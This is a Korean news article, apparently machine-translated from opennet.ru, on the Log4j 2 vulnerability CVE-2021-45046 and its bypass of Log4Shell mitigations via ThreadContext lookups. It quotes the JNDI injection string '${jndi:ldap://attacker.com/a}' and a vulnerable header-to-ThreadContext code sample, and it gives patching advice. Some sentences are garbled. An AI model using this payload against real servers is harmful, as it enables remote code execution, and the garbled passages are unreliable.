추가된 보호를 우회할 수 있는 Log4j 2의 새로운 공격 옵션

Log4j 2 라이브러리(CVE-2021-45046)의 JNDI 조회 구현에서 또 다른 취약점이 확인되었습니다. 이는 릴리스 2.15에 추가된 수정 사항에도 불구하고 보호를 위한 "log4j2.noFormatMsgLookup" 설정 사용과 관계없이 나타납니다. 이 문제는 주로 "noFormatMsgLookup" 플래그를 사용하여 보호되는 이전 버전의 Log4j 2에서 위험합니다. 이전 취약점(Log4Shell, CVE-2021-44228)으로부터의 보호를 우회할 수 있기 때문입니다. 섬기는 사람. 버전 2.15 사용자의 경우 사용 가능한 리소스가 고갈되어 애플리케이션이 중단되는 정도로 악용이 제한됩니다.

취약점은 ${ctx:loginId}와 같은 로깅을 위해 컨텍스트 조회 또는 %X, %mdc 및 %MDC와 같은 MDC 템플릿(스레드 컨텍스트 맵)을 사용하는 시스템에서만 나타납니다. 작업은 로그에 대한 출력 형식 지정 규칙을 정의하는 애플리케이션에서 컨텍스트 쿼리 또는 MDC 템플릿을 사용할 때 JNDI 대체가 포함된 데이터를 로그에 출력하기 위한 조건을 생성하는 것으로 요약됩니다.

LunaSec 연구원들은 Log4j 2.15 미만 버전의 경우 이 취약점이 Log4Shell 공격을 위한 새로운 벡터로 사용될 수 있으며, 코드 실행 여부에 관계없이 외부 데이터를 포함하는 ThreadContext 표현식이 로그 출력에 사용되는 경우 코드 실행으로 이어질 수 있다고 지적했습니다. "보호" 플래그가 활성화되었습니다. noMsgFormatLookups" 또는 템플릿 "%m{nolookups}".

보호를 우회하는 것은 "${jndi:ldap://attacker.com/a}"를 직접 대체하는 대신 이 표현식이 로그 출력 형식 지정 규칙에 사용되는 중간 변수의 값을 통해 대체된다는 사실로 귀결됩니다. . 예를 들어, 로그 출력 시 컨텍스트 쿼리 ${ctx:apiversion}을 사용하는 경우, "${jndi:ldap://attacker.com/a}" 데이터를 "${jndi:ldap://attacker.com/a}"로 대체하여 공격을 수행할 수 있습니다. apiversion 변수에 값이 기록됩니다. 취약한 코드의 예:appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") public String index(@RequestHeader("X-Api-Version") String apiVersion) { // "X-Api-Version" HTTP 헤더 값이 ThreadContext에 전달됩니다 ThreadContext.put("apiversion ", api버전 ); // 로그에 출력할 때 외부 apiversion 값은 대체를 사용하여 처리됩니다. ${ctx:apiversion} logger.info("Received a request for API version"); "안녕하세요, 세계!"를 반환합니다. }

Log4j 버전 2.15에서는 ThreadContext에 값을 전달할 때 DoS 공격을 수행하는 데 취약점을 사용할 수 있으며, 이로 인해 출력 형식 템플릿 처리에 루프가 발생합니다.

취약점을 차단하기 위해 업데이트 2.16 및 2.12.2가 게시되었습니다. Log4j 2.16 분기에서는 버전 2.15에 구현된 수정 사항과 "localhost"에 대한 JNDI LDAP 요청 바인딩 외에도 JNDI 기능이 기본적으로 완전히 비활성화되고 메시지 대체 템플릿에 대한 지원이 제거됩니다. 보안 해결 방법으로 클래스 경로에서 JndiLookup 클래스를 제거하는 것이 좋습니다(예: "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class"). .

배포판(Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) 및 Java 플랫폼 제조업체(GitHub, Docker, Oracle, vmWare, Broadcom 및 Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure 등).

출처 : opennet.ru